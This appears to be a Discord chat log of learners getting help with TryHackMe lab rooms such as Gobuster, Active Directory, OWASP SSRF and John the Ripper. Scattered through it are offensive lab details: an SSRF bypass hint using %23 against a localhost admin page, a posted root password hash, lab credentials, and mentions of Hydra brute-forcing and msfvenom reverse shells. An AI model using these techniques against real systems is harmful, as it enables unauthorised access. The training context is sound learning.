Bruteforce it

Why might this be happening. I've been trying to reach this machine for past 2 days but it just won't work. The room is "Windows Powershell".
I've tried both attackbox and the ovpn conf connection, neither is able to ping the room's machine. Please let me know if you got anything helpful.

It's a Windows machine , they don't respond to ICMP ( pings ) by default

This is normal behavior

aah right. I remeber it now. Thank you

which question do you suggest i brute i have tried all basic colour know to mankind existence and is there brute force answer available to all the question

Can you provide some shots ?

i have solved it thank you

Gave +1 Rep to @woeful jungle (current: #1 - 5768)

One question in gobusters room the dnsmaq is done for the attack box should i do that in my kali linux box to do the room

Configure the settings per task instructions then run these commands to restart the service
sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

its still not working here is the proof

File is named differently on Kali than on ubuntu

I can't remember the name from the top of my head now , try to google it or use AttackBox

are you talking about dnsmaq file or some other file. Can you maybe specify what type of file are talking about then i would chatgpt it

dnsmasq

ok let me see thank you i have been doing it my machine because i wanna familarise with my machine if i cant do it i will go to attack box and sorry for lot of question

Gave +1 Rep to @woeful jungle (current: #1 - 5770)

Thought the course was free😪🥺😞

Majority is free , there's no path on THM that's 100% free 🙂

Majority? I only got to the Linux fundamentals 1😞

I just finshed this path today. I can say with confidence that if you're serious about getting into this industry that the materials are worth the money. They regularly run sales on yearly memberships making it quite affordable especially if you start to look at what others charge in this field like CompTIA

ok

Well you can skip premium rooms and continue with free ones , however you can also check out free roadmap 🙂
https://tryhackme.com/resources/blog/free_path

This one is 100% free

Hey guys i was doing task 15 Vulnerable and Outdated Components - Lab in OSWAP i cant find the version only ones i find was jQuery v2.1.4 and Bootstrap v3.3.5 but i cant find exploits in Exploit database for this specific version should i look into other sites or is there version hidden in the page source of the website. Note: - This is only task left for me in room and i have been trying for long time

check the hint it shows you the way

so im a bit stuck with active directories

What's the issue exactly 🙂 ?

iit wants me to RDP into Phillips machine to reset sophie's password but i'm on linux and the VM wont allow me to RDP into another connection because i keep getting the connection error

thanks @woeful jungle for the response

Gave +1 Rep to @woeful jungle (current: #1 - 5778)

Use remmmina on AttackBox to connect via RDP

<< explain that one to me.

you mean from the attackbox do the RDP instead of using the Windows Machine

Yes , you can't use Windows machine for RDP since you're already on it

makes sense.

so what is Remmina?

where would i find it?

@woeful jungle I'm a bit new to this so the "tool" you're talking about i have no idea what is

It's a tool used for RDP connection , you can find it by typing remmina into terminal

ahh lemme try that thanks.

it wants me to install it on the attack box.

I'm doing the windows AD basics room

it worked! Thank you @woeful jungle

Gave +1 Rep to @woeful jungle (current: #1 - 5779)

is there are any ways to get the try hack me premium for free, i mean with any marketing campaighns

It's on giveway sometimes during CTFs/events

Hello everyone!
What method do you use to study the paths and better absorb the content?
I'm testing some

revision

But how do you review the content?

hey @woeful jungle thanks for the help the other day Remmina really helps out

Gave +1 Rep to @woeful jungle (current: #1 - 5781)

So working on AD Windows still and a GPO isn't in the administration templates which is: Prohibit access to the Control panel and PC Settings

Nevermind. I was under the wrong umbrella

Anytime , feel free to reach out whenever needed 🙂

@woeful jungle Its not letting me drag the GPO policy from the GPME to the GPM to apply it to the corresponding OUs

I was wondering why is the GPO not updating when i enable it?

Can you please verify and upload some shots 🙂 ?

one sec. I'll create a thread

Who a doxxer

@Kgb take a look at these instructions which i've followed to the letter and its not letting me attach the GPO to the OU because its not appearing in the Group Policy Management under Group POlicy Objects

Hello! I had to stop doing my cyber 101 path due to university. However, I am stronger than ever, I was reviewing the rooms and I've found out that some topics are somehow... vague, will I have a deeper understanding as it goes? In PenTest or Security Eng?

Can you provide a shot please ?

We don't do that here , that's illegal

Why

Yes , you will . Redo all the rooms you did previously

#rules

Hey everybody i hope you are all well, i finally passed yay, any future advice if you don't mind passing it on?

I've done it and I can say that it will help you a lot in understanding more intermmediate concepts

Some modules/rooms are a bit annoying to understand for future paths but they're actually the ones that are extremely useful, so keep your eyes peeled for concepts that you're unfamiliar with.

What do you need advice for 🙂 ?

Yeah sweet because i am still very green horn to be honest and i have been away from computers for over 10 years so i am doing my best to catch up and find my place haha.

Some carer advice to be honest and i know thats a hard one, i plan to lean as much as i can through thm then either train more or try grab entry level job any where doing what ever i mean we all have to start some where right?

For a career advice try to ask guys from #cyber-and-careers channel , they will point you at the right direction 🙂

Thanks dude i'll take some time off the grind and dive into some research. it's one thing to learn something right? be learning where to use it is the other half of the battle.😆

Gave +1 Rep to @woeful jungle (current: #1 - 5788)

Feel free to reach out whenever needed 🙂

Yeah thanks i'll remember that, its funny i am studding lets say the net just for arguments sake and yet i forget where to go and how to communicate funny that right?

Gave +1 Rep to @woeful jungle (current: #1 - 5789)

Hey guys, im currently in SSRF vulnerability in the OWASP Top 10 module. There is a non-mandatory challenge to get to the /admin page of the website, but it is only accessible from localhost. I've tried to modify the url like http://{ip:port}/download?url=http://127.0.0.1/admin but i get No file selected.... I also tried specifying some potential files at the end like /admin/flag.txt etc.. but nothing worked. Also tried to manipulate with the API-KEY via curl to set it to http://127.0.0.1/admin but it also didn't work. Any suggestions? I'm wondering if its the download SSRF endpoint, but i haven't found anything else.

the secret is %23 do some research around it ^_^ you should be able to find it

some call it "escaping the # hash"

the ai should also be able to give you some hints about it

Thanks, that helped a lot, my request was also badly constructed so i had to reshape it a little. I would have never figured it out to use the %23 😅

Gave +1 Rep to @plush granite (current: #3076 - 1)

I actually thought im going to request a page not a resource, that messed me up a little bit tho

I was having a hard time on this one as well glad to help

hey guys i need some help, im facing issue in login in into the machine command line, usually i use ssh tryhackme@ ipxXXXX , and password ( tryhackme) but its not letting me in. Usually i have the password info in some of the tasks.. but this time didnt show any.. im on networking Core Protocols

what task number??

task 1 introduction to task 4 http accessing the web does not need to log in
you just need to follow the instructions

while on task 5 you will be given an username
just need to follow the instructions as well

same on task 6 just follow along the instructions

task 7 they provide you with username and pass to access
Username: linda
Password: Pa$$123

Task 8 and 9 does not need to use ssh as well

if you are using an attackbox then just go directly through all the tasks

but if you are using your own machine, you need to know how to use their openvpn to connect to the vulnerable machine

hope this helps cheerio!

That's not the correct password for the machine . I don't think that you need credentials for that room

We've already talked about it , you can check it out here 🙂
#room-help message

this path takes so long but i love it holy peak

hi guys, i've learned pre security and finished the first four rooms of cyber security 101:

• Start Your Cyber Security Journey
• Linux Fundamentals
• Windows and AD Fundamentals
• Command Line
  Can you recommend me some suitable rooms to practice cz i feel rather bored when learning these tedious theories despite some labs in each rooms or maybe I don't have enough competency to solve any other challenge (CTF) and need to study more.
  Anyway, thanks

You finished all 3 Linux Fundamentals rooms ?

yes

Check out this room then 🙂
https://tryhackme.com/room/linuxstrengthtraining

hi, thanks for your help
i wonder why i can't find the above room unless clicking your link
how to find training room like this on thm

Gave +1 Rep to @woeful jungle (current: #1 - 5794)

Boom! Fun room 🙂

Btw, Does anyone know of any places where you can practice various tools and pentesting?
I kind of miss being able to practice Nmap a thousand times, like in a CTF or something that resembles real-life scenarios, so you can be sure you understand the tool 100%?

The nmap room, i couldn't post a picture 🙁

You need to verify to upload images , follow instructions from the link below to learn how to do so 🙂

Btw this is a good room to practice network enumerations tools 🙂
https://tryhackme.com/room/netsecchallenge

You can find more than 1000 rooms on hacktivities search page 🙂
https://tryhackme.com/hacktivities/search

firefox keeps crashing every damn minute

sorry, but even i typed exact name, i dont get the room 🙂

Thanks! I must have looked wrong.

Gave +1 Rep to @woeful jungle (current: #1 - 5797)

Cool. Will look into. But i was looking more for a place with a lot of challenges specific for ‘Nmap’ or ‘wireshark’ so i could practice the same tools every week.

Hello. Please can I get a personal tutor?

For?

Coding and others.

You asked.

Are you a bot?

https://tenor.com/view/cat-stare-catstare-cat-stare-sus-catglare-cat-glare-gif-14942558849944709546

I wish

Funny question

Currently stuck on the gobuster lessons as I can’t get the service to restart. It also keeps erroring out when I try to enumerate www.offensivetools.thm (I’m assuming they’re tied together)

How are you guys doing? 🙂

Configure the settings per task instructions then run these commands to restart the service
sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

https://tenor.com/view/gn-moon-pepe-penia-bitcoin-gif-9266341937416163667

im on the john the ripper basics

and im having issues with task 6

i dont understand how to crack it

i got the unshadowed.txt

||$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q||

@woeful jungle help brotha

🙏

oh wait

i got it

i had to add the whole

||root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:0:0::/root:/bin/bash||

woopsies

silly me

sorry KGB for the ping

you will have to put in the MACHINE_IP offensivetools.thm www.offensivetools.thm on the attackbox hosts file, that resolves mine when I was stucked in this room

is there a room to practice john the ripper?

and also is there a room to practice cryptography cause that stuff's confusing asl

my msfconsole doesnt launch after i tried doing the eternalblue vulnerability

i'm going to sleep, hopefully someone helps me while im sleeping so i wake up to an answer

can't be arsed

Please I'm new in this discord and I just started my cyber security journey
Can anyone please share a room to practice

Follow this path 🙂
https://tryhackme.com/resources/blog/free_path

Hey guys, need a little bit of help in the Gobuster Basics module. So i've enumerated the dirs in the website, and found the pontetional directory that i had to ||/secret|| when i went further to investigate it i found the ||/.htpasswd.js|| file, which i think might contain the flag. The only problem is that i cannot access it because its restricted. I tried to do an SSRF in the ||/secrets|| dir with no luck. I was so desparate, that i tried bruteforcing creds with Hydra on /joomla/index.php also with no luck. Anything I missed?

I am not great at math, but i got through it and can se how this is valueable knowledge.

Great job , congrats 🙂 🚀

Can you provide some shots of your issue please ?

Thanks, already got it

Gave +1 Rep to @woeful jungle (current: #1 - 5813)

Hello! I am doing the GoBuster Basicas room. For some reason, I am unable to find the subdomains. Can anyone please help? I dont understand where I am going wrong

vhost enumeration works but it is still off by one:

Well i mean vhost is correct, because the basic dns enum gives you the same output, you just don't include the duplicates, so in this case instead the 2x www. subdomains you count it as 1. But i have no clue why isn't the dns enum working. Have you correctly set up the nameserver and dnsmasq?

I can see that you found 4 subdomain here , what's the issue 🙂 ?

I see, thanks a lot! Yes I have set up dnsmasq, but it was showing some error when I restart so chatgpt told me to Edit /etc/dnsmasq.conf (Make sure it uses a different port than systemd-resolved (e.g., 5353) and references the upstream file)

Gave +1 Rep to @royal timber (current: #3078 - 1)

That one is using vhost not dns

After doing this, I did a restart and it worked

Seems like this was the issue

Using this worked, thanks a lot

Gave +1 Rep to @woeful jungle (current: #1 - 5814)

I'm doing the gobuster room and for some reason when i do "gobuster dir -u "http://www.offensivetools.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r", it gives me a 404

task 4 question 2

It cant connect to the URL

Have you configured correctly the dnsmasq? There is a workaround when you restart the /etc/init.d/dnsmasq service it usually fails, KGB posted a good workaround try it with that

this one

I just followed his workaround

it works now

thx

I have the same issue

gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

I use this command

is it wrong??

Can you provide a screenshot 🙂 ?

Well it’s to late now hahah

But

Look at the first screenshot

It’s looked exactly like that

hello

Hey👋

In that case try restarting the vm and set the nameserver again. Than restart the dnsmasq service as mentioned above sometimes it errors out so you have to do the workaround by disabling and stopping systemd-resolved and then restarting the /etc/init.d/dnsmasq. If you get no output from gobuster it means it wasn't able to find the dns name offensivetools.thm. But a screenshot would help a lot more.

hey yall, i'm doing the gobuster basics.

root@ip-10-201-26-83:~# /etc/init.d/dnsmasq restart
Restarting dnsmasq (via systemctl): dnsmasq.serviceJob for dnsmasq.service failed because the control process exited with error code.
See "systemctl status dnsmasq.service" and "journalctl -xe" for details.

it gives me this error

i followed the instructions properly

nvm, found the solution on yt:

*Hello Paul, I could not restart either (port 53 was in use). In order to be able to restart, I stopped systemd-resolved before the dnsmasq restart and started it after the dnsmasq restart:
sudo systemctl stop systemd-resolved
/etc/init.d/dnsmasq restart
sudo systemctl start systemd-resolved

After that I was able to do the exercise*

thank you i was having the same problem right now thanks for the info

Gave +1 Rep to @gilded pendant (current: #3082 - 1)

This was a tough one! But i managed to get through it and understand a lot.
Also while having fun!
Great room.

You're welcome! I see you're a fellow Psyduck fan

Yes yes

Hello everyone
For some reason i not being able to reach my flag using this commands

What am i doing wrong?

Gzus

Im dumb af

Oh no i thought that i was writing wrong

And i was

It was flag not file 😭

Congrats , great job 🙂 🚀

Try with flag.html not file.html

file.html is given just as an example in task

I have joined this server recently but feeling difficult to navigate properly
How can I connect with a learning buddy?

What exactly are you having trouble with 🙂 ?

I am at metasploit: exploitation, task 6 msfvenom
I carefully set up everything but after running reverse shell in remote machine, session in my attack box immediately established and then died
Did I miss or misconfigured anything, I've checked and even read writeup but got nothing, the problem remains
Thanks in advance for you guidance.

i forgot what exactly it was what i did here (i remember the attackbox being buggy), but you can dm me if you want, with all the steps you take

I am not there yet unfortunately. I will respond when i get there.

Quite easy actually and fun!!!

Boom! Nice.

Hello Guys
Do you recommend taking this course for a beginner.

If so how do you suggest on taking(completing) it . In order to learn and master it

Congrats , great job 🙂 🚀

Of course , you can also check out this article if you are on beginning of your journey 🙂
https://tryhackme.com/resources/blog/free_path

Hi! I have this question : "Check how many results you get when searching for learn hacking. At the time of writing, we got 1.5 billion results when searching on Google."

But when I check on google, I have like 632 millions hits and it doesn't accept it :/

Maybe it's because I'm in Quebec? So there is less hits?

That's a bug on THM's side. Delete everything from answer box and just click check answer

That question doesn't actually require an answer 🙂

Hi everyone, currenlty having issues with Active Directory Basics - Task 4

I've followed through and given Phillip access and pressed finished,
logged into Phillip and opened powershell to copy the powershell script. but comes up with this

Get -Process: a positonal parameter cannot be found that accepts argument 'Set-ADAccountPassword '.

Edit: found it issue - dont copy pasta everything from powershell and read what is being copied...

Hahaha

nice bro, keep going

Nice I’m at the same spot! Just got to finish Moniker Link

Hey yall Im on the Networking Core Protocols room and for some reason I am unable to telnet into the host required to complete the question on the HTTPS sections

It keeps timing out and I am not sure what I am doing wrong, I've simply done:

telnet 10.201.39.172 80

and also tried,

telnet

then
open 10.201.39.172 80

neither of these worked and both timed out, am I doing something wrong?

Okay nvm, I think I didn't properly launch the attack box, and was also trying to run this command from a different device than I was doing the room on. Not sure how that might be the issue but let me give it a try on the same device from the attack box

hello aspiring hackers, time to join this room for the cs_101_path

hmm probably a bug
just started this path and already completed certification

can you provide a shot please ?

You need to send a request before a connection times out

I was able to get it figured out, someone told me that WSL acts funny with certain networking situations and also the main issue was that I was trying to access the host from a different machine which means it wasn’t using the THM vpn, thank you tho! @woeful jungle

Gave +1 Rep to @woeful jungle (current: #1 - 5843)

Hey, wanna pick some brains/get some thoughts around CAPA. I get how it works and what it is for, that is easy enough to understand, does anyone else struggle getting their heads around namespaces, capabilities and rules? I find it difficult understanding that specific part. I get it like categorises to some extent? IDK it just doesn't click in my head, how important is it to understand these parts?

Well if you want to do OffSec not really. If you are all in malware analysis or blue teaming you should at least know where to look to find the important stuff. You can always look up different namespaces, capabilities etc… the important part is knowing how does the tool work and what do you use it for.

This is often the problem for me aswell😂

verify your account with THM token and you can insert images here without links

I have been having a problem with the windows command line task 3. And the question about the ipsubmask is giving me trouble

It seems that the ip submarine doesn't fit into the answer box. I don't want to answer but am I just missing something or is this a bug? Also I was trying to ping example.com but it didn't send anything back

scroll up a bit

I took a guess and got it